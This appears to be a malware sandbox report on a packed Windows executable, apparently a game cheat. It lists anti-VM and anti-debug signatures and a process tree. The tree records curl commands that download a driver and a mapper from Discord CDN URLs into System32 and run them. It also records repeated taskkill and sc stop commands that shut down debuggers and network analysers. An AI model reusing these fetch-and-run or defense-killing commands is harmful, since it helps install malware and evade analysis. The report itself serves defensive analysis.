b30dfb8608adf0c39754145ed1e8e8cf391ef1a5cafeb207bdb53dbfe80a4a08

Analysis

max time kernel
13s
max time network
31s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
24-03-2023 22:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NeptnExternalFree.exe
Size

3.4MB
MD5

bbedbbb87552cceb179e196588684cbc
SHA1

d1b7d2834140f503d7a7b92df30fadece473c29c
SHA256

b30dfb8608adf0c39754145ed1e8e8cf391ef1a5cafeb207bdb53dbfe80a4a08
SHA512

1e65d28aad644fc791a01eb55d3dc53d6f5c63c5fb5c9e52c96c384b5109499364a0ca433e09383972419b02e53662f15f9d238c4313aeb6842a4057be9429f3
SSDEEP

98304:i1NGlQS2DA5FlCPfvJj2wmfXWjY9sz985D:i1N+QXAHlohyP/WsA98B

Score

9^/10

evasion themida trojan

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

NeptnExternalFree.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ NeptnExternalFree.exe
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	NeptnExternalFree.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

NeptnExternalFree.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	NeptnExternalFree.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	NeptnExternalFree.exe

Themida packer 5 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/3252-133-0x00007FF715DF0000-0x00007FF716709000-memory.dmp	themida
behavioral2/memory/3252-134-0x00007FF715DF0000-0x00007FF716709000-memory.dmp	themida
behavioral2/memory/3252-135-0x00007FF715DF0000-0x00007FF716709000-memory.dmp	themida
behavioral2/memory/3252-136-0x00007FF715DF0000-0x00007FF716709000-memory.dmp	themida
behavioral2/memory/3252-357-0x00007FF715DF0000-0x00007FF716709000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

NeptnExternalFree.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA NeptnExternalFree.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Drops file in System32 directory 2 IoCs

Processes:

taskkill.execurl.exe

description ioc process

File created C:\Windows\System32\mapper.exe taskkill.exe
File created C:\Windows\System32\NeptnDriver.sys curl.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

NeptnExternalFree.exe

pid process

3252 NeptnExternalFree.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	NeptnExternalFree.exe

description	ioc	process
File created	C:\Windows\System32\mapper.exe	taskkill.exe
File created	C:\Windows\System32\NeptnDriver.sys	curl.exe

pid	process
3252	NeptnExternalFree.exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
4904	sc.exe
4236	sc.exe
2016	sc.exe
5060	sc.exe
4360	sc.exe
2340	sc.exe
3004	sc.exe
1624	sc.exe
3584	sc.exe
2016	sc.exe
3128	sc.exe
752	sc.exe
1552	sc.exe
4744	sc.exe
4300	sc.exe
1032	sc.exe
860	sc.exe
4968	sc.exe
3188	sc.exe
2000	sc.exe
752	sc.exe
2240	sc.exe
2128	sc.exe
3788	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4856	taskkill.exe
2636	taskkill.exe
4680	taskkill.exe
3904	taskkill.exe
2500	taskkill.exe
3780	taskkill.exe
3404	taskkill.exe
1752	taskkill.exe
4240	taskkill.exe
2260	taskkill.exe
4788	taskkill.exe
1568	taskkill.exe
4024	taskkill.exe
4880	taskkill.exe
532	taskkill.exe
4336	taskkill.exe
3544	taskkill.exe
1704	taskkill.exe
2260	taskkill.exe
1212	taskkill.exe
2772	taskkill.exe
4100	taskkill.exe
3584	taskkill.exe
3084	taskkill.exe
1888	taskkill.exe
4864	taskkill.exe
1696	taskkill.exe
1032	taskkill.exe
4976	taskkill.exe
2364	taskkill.exe
3544	taskkill.exe
4792	taskkill.exe
1568	taskkill.exe
3004	taskkill.exe
1064	taskkill.exe
2980	taskkill.exe
2980	taskkill.exe
532	taskkill.exe
3548	taskkill.exe
3304	taskkill.exe
1372	taskkill.exe
4300	taskkill.exe
1568	taskkill.exe
4864	taskkill.exe
3304	taskkill.exe
1736	taskkill.exe
4428	taskkill.exe
3084	taskkill.exe
4316	taskkill.exe
4428	taskkill.exe
3544	taskkill.exe
4220	taskkill.exe
4684	taskkill.exe
2468	taskkill.exe
5092	taskkill.exe
4824	taskkill.exe
4336	taskkill.exe
4920	taskkill.exe
4800	taskkill.exe
4240	taskkill.exe
1624	taskkill.exe
2500	taskkill.exe
4976	taskkill.exe
1852	taskkill.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

msedge.exemsedge.exe

pid process

1412 msedge.exe
1412 msedge.exe
1476 msedge.exe
1476 msedge.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

Processes:

msedge.exe

pid process

1476 msedge.exe
1476 msedge.exe
1476 msedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

pid	process
1412	msedge.exe
1412	msedge.exe
1476	msedge.exe
1476	msedge.exe

pid	process
1476	msedge.exe
1476	msedge.exe
1476	msedge.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exesc.exetaskkill.exetaskkill.exesc.exetaskkill.exetaskkill.execmd.exe

description	pid	process
Token: SeDebugPrivilege	1568	taskkill.exe
Token: SeDebugPrivilege	3904	taskkill.exe
Token: SeDebugPrivilege	4088	taskkill.exe
Token: SeDebugPrivilege	4252	taskkill.exe
Token: SeDebugPrivilege	4360	sc.exe
Token: SeDebugPrivilege	4336	taskkill.exe
Token: SeDebugPrivilege	1064	taskkill.exe
Token: SeDebugPrivilege	752	sc.exe
Token: SeDebugPrivilege	4220	taskkill.exe
Token: SeDebugPrivilege	4316	taskkill.exe
Token: SeDebugPrivilege	2260	cmd.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

msedge.exe

pid process

1476 msedge.exe
1476 msedge.exe
1476 msedge.exe

pid	process
1476	msedge.exe
1476	msedge.exe
1476	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

NeptnExternalFree.execmd.exemsedge.exe

description	pid	process	target process
PID 3252 wrote to memory of 4680	3252	NeptnExternalFree.exe	cmd.exe
PID 3252 wrote to memory of 4680	3252	NeptnExternalFree.exe	cmd.exe
PID 4680 wrote to memory of 1476	4680	cmd.exe	msedge.exe
PID 4680 wrote to memory of 1476	4680	cmd.exe	msedge.exe
PID 1476 wrote to memory of 2056	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 2056	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 4952	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 1412	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 1412	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 3640	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 3640	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 3640	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 3640	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 3640	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 3640	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 3640	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 3640	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 3640	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 3640	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 3640	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 3640	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 3640	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 3640	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 3640	1476	msedge.exe	msedge.exe
PID 1476 wrote to memory of 3640	1476	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\NeptnExternalFree.exe
"C:\Users\Admin\AppData\Local\Temp\NeptnExternalFree.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:3252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start https://discord.gg/xCRS6yyPF6
2⤵
- Suspicious use of WriteProcessMemory
PID:4680

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/xCRS6yyPF6
3⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc4da446f8,0x7ffc4da44708,0x7ffc4da44718
4⤵
PID:2056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,8831321627348863583,12254437182611880365,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
4⤵
PID:4952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,8831321627348863583,12254437182611880365,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1412

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,8831321627348863583,12254437182611880365,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2856 /prefetch:8
4⤵
PID:3640

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,8831321627348863583,12254437182611880365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3768 /prefetch:1
4⤵
PID:4936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,8831321627348863583,12254437182611880365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:1
4⤵
PID:2728

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,8831321627348863583,12254437182611880365,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1
4⤵
PID:4024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/879146399290241105/1070367957353500782/NeptnDriver.sys --output C:\Windows\System32\NeptnDriver.sys >nul 2>&1
2⤵
PID:1924

C:\Windows\system32\curl.exe
curl https://cdn.discordapp.com/attachments/879146399290241105/1070367957353500782/NeptnDriver.sys --output C:\Windows\System32\NeptnDriver.sys
3⤵
- Drops file in System32 directory
PID:3764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
2⤵
PID:2648

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerUI.exe
3⤵
- Kills process with taskkill
PID:1568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
2⤵
PID:4108

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerSvc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
2⤵
PID:1444

C:\Windows\system32\taskkill.exe
taskkill /f /im Ida64.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
2⤵
PID:4024

C:\Windows\system32\taskkill.exe
taskkill /f /im OllyDbg.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/879146399290241105/1057075244617187368/mapper.exe --output C:\Windows\System32\mapper.exe >nul 2>&1
2⤵
PID:4864

C:\Windows\system32\curl.exe
curl https://cdn.discordapp.com/attachments/879146399290241105/1057075244617187368/mapper.exe --output C:\Windows\System32\mapper.exe
3⤵
PID:4264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
2⤵
PID:3872

C:\Windows\system32\taskkill.exe
taskkill /f /im Dbg64.exe
3⤵
PID:4360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
2⤵
PID:4260

C:\Windows\system32\taskkill.exe
taskkill /f /im Dbg32.exe
3⤵
PID:4336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
2⤵
PID:4816

C:\Windows\system32\sc.exe
sc stop HTTPDebuggerPro
3⤵
- Launches sc.exe
PID:3128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
2⤵
PID:4428

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
2⤵
PID:2092

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
3⤵
PID:752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
2⤵
PID:3736

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
2⤵
PID:2116

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerUI.exe
3⤵
PID:4316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
2⤵
PID:1696

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerSvc.exe
3⤵
- Kills process with taskkill
PID:2260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
2⤵
PID:3956

C:\Windows\system32\sc.exe
sc stop HTTPDebuggerPro
3⤵
- Launches sc.exe
PID:2016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
2⤵
PID:2988

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:4240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
2⤵
PID:4264

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:4864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
2⤵
PID:1888

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:1212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\mapper.exe C:\Windows\System32\NeptnDriver.sys
2⤵
PID:396

C:\Windows\System32\mapper.exe
C:\Windows\System32\mapper.exe C:\Windows\System32\NeptnDriver.sys
3⤵
PID:1032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
2⤵
PID:4412

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:2980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
2⤵
PID:996

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
2⤵
PID:2024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
2⤵
PID:4640

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:4684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
2⤵
PID:2992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
2⤵
PID:1260

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:4428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
2⤵
PID:3544

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
3⤵
PID:4872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
2⤵
PID:3084

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
3⤵
PID:3912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
2⤵
PID:2260

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:1696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
2⤵
PID:652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
2⤵
PID:4780

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:4240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
2⤵
PID:3788

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
2⤵
PID:4016

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:4880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
2⤵
PID:396

C:\Windows\system32\sc.exe
sc stop HTTPDebuggerPro
3⤵
- Launches sc.exe
PID:5060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
2⤵
PID:2004

C:\Windows\system32\sc.exe
sc stop HTTPDebuggerProSdk
3⤵
- Launches sc.exe
PID:1032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
2⤵
PID:3400

C:\Windows\system32\sc.exe
sc stop KProcessHacker3
3⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:4360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
2⤵
PID:4336

C:\Windows\system32\sc.exe
sc stop KProcessHacker2
3⤵
- Launches sc.exe
PID:2340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
2⤵
PID:5092

C:\Windows\system32\sc.exe
sc stop KProcessHacker1
3⤵
- Launches sc.exe
PID:2000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
2⤵
PID:4640

C:\Windows\system32\sc.exe
sc stop wireshark
3⤵
- Launches sc.exe
PID:752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
2⤵
PID:3404

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerUI.exe
3⤵
- Kills process with taskkill
PID:3548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
2⤵
PID:1260

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerSvc.exe
3⤵
PID:1072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
2⤵
PID:3544

C:\Windows\system32\sc.exe
sc stop HTTPDebuggerPro
3⤵
- Launches sc.exe
PID:2240

C:\Windows\system32\cmd.exe
